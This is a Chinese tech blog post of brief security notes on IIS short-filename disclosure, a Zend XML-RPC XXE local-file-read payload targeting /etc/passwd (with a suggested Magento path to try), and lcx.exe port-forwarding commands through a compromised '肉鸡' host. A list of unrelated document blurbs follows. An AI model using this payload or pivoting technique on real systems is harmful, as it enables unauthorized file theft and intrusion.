`

最近接触的几个技术随笔

 
阅读更多

1.IIS短文件和文件夹泄漏漏洞

   这个漏洞具体可以看核攻击大牛的blog:http://lcx.cc/?i=2643

 

   我大概谈谈我的理解吧,由于历史遗留问题,在windows系统中会对长度超过8个字母的文件夹和后缀超过3个时,会生成一个对应的8.3格式的短文件,而这个文件则是可以通过*和~来进行通配预测的,具体类似于sql盲注,

   有人写了个java板的利用工具,但是实际使用中你会发现,你只能预测到前六个字母类似于upload~1.asp这种,实际危害还是比较有限的。

 

 

2.zend xml rpc本地文件读取漏洞

   这个漏洞具体可以看:http://zone.wooyun.org/content/531

   这个也是比较有意思的

 

<?xml version="1.0"?>
 <!DOCTYPE foo [    
<!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" >]>
<methodCall>  
<methodName>
&xxe;
</methodName>
</methodCall>

 其中的xxe是比较关键的  以及后面的那个


xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"

  但在实际中我没能找到例子来实验,

 

不过根据我的分析在mageoto中应该采用了这个zend 模块,具体的路径是

 

lib/Zend/XmlRpc/Server.php

 

大家可以自行实验,

 

3.试验了下lcx端口转发,第一次用留个纪念

 

lcx.exe -slave 本人ip 端口a  肉鸡ip 端口b

lcx.exe -listen 端口a 端口c

 

 

 

 

分享到:
| python中利用twisted的异步通信和微线程 ...
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

    信息技术教学随笔.doc

    信息技术教学随笔主要探讨了如何在信息技术教学中应对教材陈旧和激发学生兴趣的问题。作者指出,信息技术学科因其快速发展,教学内容应及时更新,以适应不断变化的信息环境。针对使用过时教材的情况,教师采取了以下...

    基于Java与跨平台技术的crostitch涂鸦随笔设计与实现源码

    本项目是一款基于Java和跨平台技术的crostitch涂鸦随笔设计与实现源码,包含65个文件,其中包括30个Java源文件、16个PNG图片文件、7个JavaScript文件、2个XML文件、1个Git忽略文件、1个Markdown文件、1个Maven项目...

    网恋随笔散文随笔散文.rar

    压缩包子文件的文件名称列表仅包含一个"网恋随笔散文随笔散文.pdf",同样不涉及任何IT技术或知识内容。 如果您的目的是寻找关于IT教育或者与技术相关的知识,我建议提供更具体的信息,例如具体的IT主题、编程语言、...

    介绍几种教育随笔的写作方式.pdf

    介绍几种教育随笔的写作方式.pdf

    科学与技术教学随笔.docx

    本文基于《科学与技术教学随笔》文档,从中提取并深入探讨了两个核心知识点:**小船浮沉实验**和**科学放大镜探索**。这两个知识点不仅体现了科学教学的重要性,还展示了如何通过实践激发学生的兴趣和创造力。 ####...

    散文随笔【黄牛散文随笔】.rar

    黄牛的散文随笔以PDF形式发布,顺应了这一趋势,使得更多人能够便捷地接触到他的作品,扩大了作品的影响力。 6. **版权保护**:尽管PDF文件易于传播,但也需要注意版权问题。下载和分享这类文件时,应确保遵循合法...

    教师随笔-小班教师政治随笔5篇.docx

    根据给定文件的信息,我们可以提炼出以下几个主要的知识点: ### 1. 幼儿教育的重要性 - **基础知识**:从婴幼儿出生到成长的过程是不断进步发展的。幼儿园阶段是这一过程中的重要环节,它不仅关系到孩子们的身体...

    一年级语文教学随笔.pdf

    这篇教学随笔主要探讨了以下几个方面: 首先,教师需要认识到一年级学生的特点,他们活泼好动,注意力维持时间较短。因此,创设有趣、富有吸引力的教学情境至关重要。例如,通过设立小奖励,如小红旗、小红花等,...

    生活随笔学习总结.docx

    但从中我们可以提炼出几个与技术稍微相关的主题: 1. **生物学习与观察**:作者在描述自己上课时观察昆虫的情况,这涉及到生物学知识,特别是昆虫学。通过细致的观察,作者对生物学产生了浓厚的兴趣,这是科学学习...

    高二随笔作文4篇.docx

    【部分内容】的四个随笔片段主要表达了以下几个主题: 1. 自律的重要性:作者通过自己的经历强调了保持自律对于学习和生活的重要性,即使短暂的放松也可能导致原有的习惯和进度被打乱。 2. 内心的力量:鼓励人们...

    散文随笔_生活三部曲散文随笔.rar

    在IT知识应用方面,我们可以讨论以下几个点: 1. **文件压缩技术**:RAR是一种高效的数据压缩算法,允许用户将大量文件打包成较小的尺寸,便于存储和分享。理解RAR格式的压缩原理和如何操作相关软件是IT素养的一...

    关于描写夏天的散文随笔.doc

    关于描写夏天的散文随笔.doc

    MATHCAD学步随笔

    工程数学软件实用入门资料,可视很好,不需要专门的语言。

    一年级数学第一学期教学随笔.pdf

    一年级数学第一学期教学随笔.pdf

    关于小学一年级数学下册教学随笔.docx

    关于小学一年级数学下册教学随笔.docx

    Java完整随笔(学习)

    "Java完整随笔(学习)"可能包含了一系列关于Java编程的基础到高级概念的笔记,是学习Java的好资源。以下是一些可能涵盖的重要知识点: 1. **Java基础**:这部分可能包括了Java的基本语法,如变量、数据类型、...

    生活感言随笔.docx

    很抱歉,根据您提供的文件信息,标题和描述中提到的“生活感言随笔.docx”显然是一份关于个人感悟和生活体验的文档,并非与技术相关的内容。标签虽然注明为“技术”,但从部分内容来看,主要讲述的是作者对于日常...

    有关家风的经典散文随笔.doc

    有关家风的经典散文随笔.doc

    校园文明随笔精选.doc

    校园文明随笔精选.doc 校园文化是学校环境的重要窗口,也是造就小学生幸福的摇篮。它培养人的素养,修养人的品德,开发人的知慧,是教育事业今后开展宝藏,对学生具有潜移默化的阻碍。 在校园文化的环境中,我们...

    盛大网游项目工作随笔

    在网游开发与运营中,涉及的技术知识点广泛且深入,包括但不限于以下几个方面: 1. **网络编程**:网游的核心在于实时的网络交互,因此网络编程是基础。TCP/IP协议栈的理解,以及如何处理延迟、丢包、乱序等问题至...

Magicbox
Global site tag (gtag.js) - Google Analytics